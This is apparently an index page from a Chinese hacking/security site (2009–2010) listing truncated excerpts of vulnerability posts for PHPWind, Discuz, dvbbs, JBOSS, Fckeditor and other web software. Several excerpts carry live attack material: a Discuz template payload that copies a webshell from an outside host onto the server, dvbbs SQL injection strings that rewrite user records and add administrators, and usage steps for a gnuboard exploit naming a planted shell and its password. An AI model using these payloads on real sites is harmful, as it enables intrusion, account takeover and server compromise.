|
|
Phpwind7.5 后台本地包含漏洞利用
|
|
日期:2010-02-08 10:44:53
点击:71 评论:0
|
影响版本:Phpwind7.5 文件:hackrateadmin.php源码:?php!function_exists('readover') exit('Forbidden');define ( H_R, R_P . hack/rate/ );define ( L_R, R_P . lib/ );InitGP ( array ('ajax' ) );$action = strtolower ( ($job) ? $job : admin );$filepath = H |
|
|
Discuz!7.0-7.2后台settings.inc.php中写shell漏洞
|
|
日期:2010-02-08 10:44:26
点击:263 评论:0
|
影响版本 Discuz!7.0-7.2 漏洞详情:if($operation == 'uc' is_writeable('./config.inc.php') $isfounder) { $ucdbpassnew = $settingsnew['uc']['dbpass'] == '********' ? UC_DBPW : $settingsnew['uc']['dbpass']; if($settingsnew['uc']['connect']) { $uc_dblink |
|
|
Discuz插件《虚拟股市》blind Injection Vul利用
|
|
日期:2010-02-05 10:15:46
点击:68 评论:0
|
漏洞的发现来自于对某站的渗透,由于其discuz版本为7.0,所以我只能把眼光聚焦在了它所安装的第三方插件上。 经过简单的测试,就发现了《虚拟股市》存在注射漏洞: http://www.target.com/plugin.php ... _Onestockid=91 # 91为可变参数 http://www.target.com/plugin. |
|
|
Shopxp v8.0 SQL Injection 0day
|
|
日期:2010-02-01 10:30:18
点击:64 评论:0
|
最近帮朋友看一个站,发现用的是shopxp,就下了shopxp源码回来读了下,发现漏洞不少,下面一起来看看。这套系统使用了早期的枫叶防注系统,只过滤了GET,并且可以绕过,这里不谈绕过的问题了,我们看到 xplistpl.asp 9-36行代码: table width=100% border=0 cellspacing |
|
|
睛天电影系统注入漏洞
|
|
日期:2010-01-25 10:24:48
点击:53 评论:0
|
睛天电影系统 Sql Injection Vulnerability 0day Author: My5t3ry Official site: http://www.qingtiandy.cn/ vulnerable: /look/template/wmv.asp Code: % IF Not ChkPost() Then response.Redirect G_error_page_1 response.End() End IF id=replace(request(url),', |
|
|
OK3W v4.7文章管理系统漏洞
|
|
日期:2010-01-25 10:23:55
点击:400 评论:0
|
by 3x OK3W是一套文章管理系统,整套系统的程序结构是以自定义类来实现的,很有创意o(_)o... 安全性还是比较好的,目前免费版4.7存在这个漏洞,官网也存在,不过不知道补了没,上次路过被发现了 后台验证过程: 本来我看到这里以为可以好不费力的拿下,基础过过关,这 |
|
|
韩国gnuboard论坛漏洞EXP及使用方法
|
|
日期:2010-01-14 12:10:34
点击:123 评论:0
|
摘自:红科网安 http://bbs.honkwin.com 1.本机搭建PHP环境 2.将EXP程序保存为akt.php 3.CMD下执行php akt.php 4.产生的akt.txt中记录成功URL 5.http://目标URL/data/hardison.php 密码 :akteam 用PHP连接 EXP: 复制代码 ?php echo +-------------------------------- |
|
|
PHPWind7.5 远程包含0DAY
|
|
日期:2010-01-13 11:23:07
点击:233 评论:0
|
代码分析: ?php if ($route == groups) { require_once $basePath . '/action/m_groups.php'; } elseif ($route == group) { require_once $basePath . '/action/m_group.php'; } elseif ($route == galbum) { require_once $basePath . '/action/m_galbum.php'; } 这 |
|
|
MyBB 1.4 admin remote code execution vulnerability
|
|
日期:2010-01-11 11:23:30
点击:30 评论:0
|
MyBB 1.4 admin remote code execution vulnerabilityby flyh4tteam: http://www.80vul.comdate: 2010-01-10测试版本MyBB 1.44.11 [一]漏洞分析在index.php文件336行左右代码如下:[code]//index.php,336行左右$plugins-run_hooks(index_end);//出现了eval函数,注意参 |
|
|
phpwind 7.5 Multiple Include Vulnerabilities
|
|
日期:2010-01-11 11:23:01
点击:35 评论:0
|
phpwind 7.5 Multiple Include Vulnerabilities author: 80vulteam:http://www.80vul.com一.api/class_base.php本地包含漏洞1.描叙 api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.2. 具体分析api/class_base. |
|
|
JBOSS远程代码执行漏洞
|
|
日期:2010-01-11 11:20:27
点击:97 评论:0
|
JBOSS默认配置会有一个后台漏洞,漏洞发生在 jboss.deployment命名空间 中的 addURL()函数, 该函数可以远程下载一个war压缩包并解压 访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图 下拉找到如下图所示 点击flavor=URL,type=DeploymentScanner进入 在输 |
|
|
dvbbs 8.2前台0day
|
|
日期:2009-12-25 13:52:57
点击:72 评论:0
|
小航blog 利用: 发帖子,标题为下面的sql语句,然后点评论。0为中立, 1为支持, 2为反对 都行。 这时sql语句被执行 库名: a,,1,hang,2008-2-4,,2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username=hang-- 加前台和后台管理员: a,,1,hang,2008 |
|
|
PHPMPS 0day
|
|
日期:2009-12-23 10:47:48
点击:73 评论:0
|
Author:Minghacker From: http://www.3est.com Blog: http://yxmhero1989.blog.163.com PHPMPS ,主站 http://www.phpmps.com/ 有下载。v2.0正式版GBK 和 v2.0正式版UTF8 都存在严重的安全隐患,希望大家不要破坏,平静地等待官方的修复升级。 include目录下有fckeditor |
|
|
supersite7.5找回密码的鸡肋问题!
|
|
日期:2009-12-21 14:20:21
点击:59 评论:0
|
source/do_lostpasswd.php 这是找回密码的文件! if(submitcheck('lostpwsubmit')) { $_POST['username'] = trim($_POST['username']); if ($_POST['username']) { $user = uc_get_user($_POST['username']); $query = $_SGLOBAL['db']-query(SELECT * FROM .tname('us |
|
|
MvMmall漏洞分析
|
|
日期:2009-12-17 10:23:38
点击:139 评论:0
|
经过分析。此程序的session的记录方式是通过 include/session.class.php文件。 此文件的 mvm_session 类的 01. function handler(){ 02. session_module_name( 'user' ); 03. session_set_save_handler( 04. array ( 'mvm_session' , 'open' ), 05. array ( 'mvm_sessi |
|
|
对Fckeditor的一些漏洞总结
|
|
日期:2009-12-16 09:36:37
点击:449 评论:0
|
对Fckeditor的一些漏洞总结当然这都是网上公开过的....这次把他总结出来..放到blog上希望对大家有所帮助 Fckeditor版本多..支持很多语言..所以本文不针对任何版本或者什么语言.只讲利用方法 fckeditor/editor/filemanager/browser/default/browser.html?Type=ImageConn |
|
|
php168 v6.0拿shell漏洞
|
|
日期:2009-12-11 10:16:44
点击:138 评论:0
|
分两步 第一 do/下jsarticle.php文件 if(!eregi(^(hot|com|new|lastview|like|pic)$,$type)){ die(类型有误); } $FileName=dirname(__FILE__)./../cache/jsarticle_cache/; if($type=='like'){ $FileName.=floor($id/3000)./; }else{ unset($id); } $FileName.={$type} |
|
|
Google Wave XSS(Unpatched)
|
|
日期:2009-12-07 12:45:11
点击:58 评论:0
|
描述: Google Wave 是 Google 的一款网络交流服务。它将 电子邮件 和即时通讯结合起来,使人们的交流更方便。 Wave Gadget 是 Google Wave 两种扩展中的其中一种。 Gadgets 是功能完备的应用。 Wave Gadget可以引用一个外域的xml文件来实现用户所需要的功能。但是 Wav |
|
|
Discuz!的最新拿Webshell法,测试可行
|
|
日期:2009-12-07 12:44:33
点击:60 评论:0
|
目前通吃所有DZ版本。 1. 随便选一模板文件,选择编辑 2. 找一个空间上传一个webshell, 假定其地址为 http://www.abc.com/shell.txt 3. 在任意位置输入: {eval copy('http://www.abc.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');} 4. 保存, 刷新 5. 访问该 |
|
|
PHP漏洞全解(六)-跨网站请求伪造
|
|
日期:2009-11-30 12:46:52
点击:95 评论:0
|
CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用 |
|
|
|
|
本月热点文章 |
|
|
|
|
|
本月推荐文章 |
|
|
|
|
|
相关分类 |
|
|
|
|